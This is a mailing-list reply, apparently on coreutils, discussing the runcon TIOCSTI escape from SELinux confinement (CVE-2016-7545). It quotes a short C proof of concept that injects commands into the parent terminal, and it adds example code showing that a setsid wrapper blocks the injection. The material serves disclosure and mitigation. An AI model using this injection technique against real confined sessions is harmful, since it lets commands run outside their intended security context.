On 25/09/16 12:39, [email protected] wrote:
> When executing a program via the runcon utility, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> execute arbitrary commands without the SELinux security context.
>
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
>
> int main()
> {
>     char *cmd = "id\n";
>     while(*cmd)
>         ioctl(0, TIOCSTI, cmd++);
>     execlp("/bin/id", "id", NULL);
> }
> $ gcc test.c -o test
> $ runcon -t sandbox_t ./test
> id
> uid=1000 gid=1000 groups=1000
> context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
> $ id    <--- did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
> This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
> https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379
There are side effects to that though, like not being able to background tasks etc.?

There's a collection of links on the issue at https://bugs.debian.org/816320

If setsid was an option, one could use `runcon ... setsid the_command`, though that would be less secure operation by default.

The same issue impacts chroot(1) somewhat also.

I'm not sure of the best fix here.

Pádraig
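The `setsid the_command` idea above, worked through as an added example (this is not code from the thread, from coreutils or from the SELinux sandbox): a minimal wrapper that forks, moves the child into a fresh session and execs it, plus a probe that replays the quoted TIOCSTI trick from such a session against a private pty. The point it demonstrates is why the new session helps: Linux only honours TIOCSTI when the target tty is the caller's controlling terminal or the caller holds CAP_SYS_ADMIN, and a process that has called setsid() has no controlling terminal, so the ioctl fails with EPERM even though fd 0 is still the same terminal. The job-control side effect Pádraig mentions falls out of the same design: the child is no longer in the shell's session, so the shell cannot background it. The function names, the use of /dev/ptmx directly and the /bin/sh used for testing are this example's own choices.

```c
/* Added example, not from the thread or from coreutils: a "run the command
 * in a new session" wrapper and a probe showing why that blocks TIOCSTI.
 * The kernel only accepts TIOCSTI on the caller's controlling terminal
 * (or with CAP_SYS_ADMIN); after setsid() there is no controlling terminal.
 * Function names and the use of /dev/ptmx are this example's own choices.
 * Build: gcc -Wall -o setsid_demo setsid_demo.c ; run: ./setsid_demo id
 */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Push s into fd's input queue byte by byte, as the quoted test.c does.
 * Returns 0 on success or -errno. */
int tiocsti_inject(int fd, const char *s)
{
    for (; *s; s++)
        if (ioctl(fd, TIOCSTI, s) < 0)
            return -errno;
    return 0;
}

/* The mitigation: fork, move the child into a fresh session (no controlling
 * tty), exec argv.  Returns the command's exit status, 128+signal if killed,
 * or -errno.  Side effect: the child is outside the caller's session, so the
 * interactive shell cannot job-control (background/foreground) it. */
int run_in_new_session(char *const argv[])
{
    int st;
    pid_t pid = fork();
    if (pid < 0)
        return -errno;
    if (pid == 0) {
        /* a forked child is never a process-group leader, so setsid() succeeds */
        if (setsid() < 0)
            _exit(127);
        execvp(argv[0], argv);
        _exit(127);
    }
    if (waitpid(pid, &st, 0) < 0)
        return -errno;
    return WIFEXITED(st) ? WEXITSTATUS(st) : 128 + WTERMSIG(st);
}

/* Returns 1 if a child that called setsid() reports a session id different
 * from ours, 0 if not, -errno on failure. */
int child_session_differs(void)
{
    int p[2], st;
    pid_t sid = -1, pid;
    if (pipe(p) < 0 || (pid = fork()) < 0)
        return -errno;
    if (pid == 0) {
        pid_t s = setsid();
        _exit(write(p[1], &s, sizeof s) == (ssize_t)sizeof s ? 0 : 1);
    }
    close(p[1]);
    if (read(p[0], &sid, sizeof sid) != (ssize_t)sizeof sid)
        sid = -1;
    close(p[0]);
    waitpid(pid, &st, 0);
    return sid > 0 && sid != getsid(0);
}

/* Replay the escape against a private pty pair (needs /dev/ptmx) instead of
 * the real terminal: the child detaches with setsid() and opens the slave
 * with O_NOCTTY, so it holds a tty fd that is not its controlling terminal,
 * like the confined process after `setsid the_command`.  Returns the child's
 * tiocsti_inject result: -EPERM is the expected refusal; 0 means the caller
 * had CAP_SYS_ADMIN; -EIO means this kernel has TIOCSTI disabled. */
int inject_from_new_session(void)
{
    int master, unlock = 0, n, st;
    char path[32];
    pid_t pid;
    master = open("/dev/ptmx", O_RDWR | O_NOCTTY);
    if (master < 0 || ioctl(master, TIOCSPTLCK, &unlock) < 0
        || ioctl(master, TIOCGPTN, &n) < 0)
        return -errno;
    snprintf(path, sizeof path, "/dev/pts/%d", n);
    if ((pid = fork()) < 0)
        return -errno;
    if (pid == 0) {
        int slave, r;
        setsid();
        slave = open(path, O_RDWR | O_NOCTTY);
        r = slave < 0 ? -errno : tiocsti_inject(slave, "id\n");
        _exit(-r);                 /* errno values fit in an exit status */
    }
    waitpid(pid, &st, 0);          /* keep the master open until the child is done */
    close(master);
    return WIFEXITED(st) ? -WEXITSTATUS(st) : -ECHILD;
}

int main(int argc, char **argv)
{
    printf("TIOCSTI from a new session into a pty it does not control: %s\n",
           strerror(-inject_from_new_session()));
    return argc > 1 ? run_in_new_session(argv + 1) : 0;
}
```

Run as `./setsid_demo id` from a terminal and the injected "id\n" never reaches the shell; the probe reports "Operation not permitted" unless the process holds CAP_SYS_ADMIN. The same detachment is what makes `fg`/`bg` stop working for the wrapped command, which is the trade-off the reply above is weighing.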
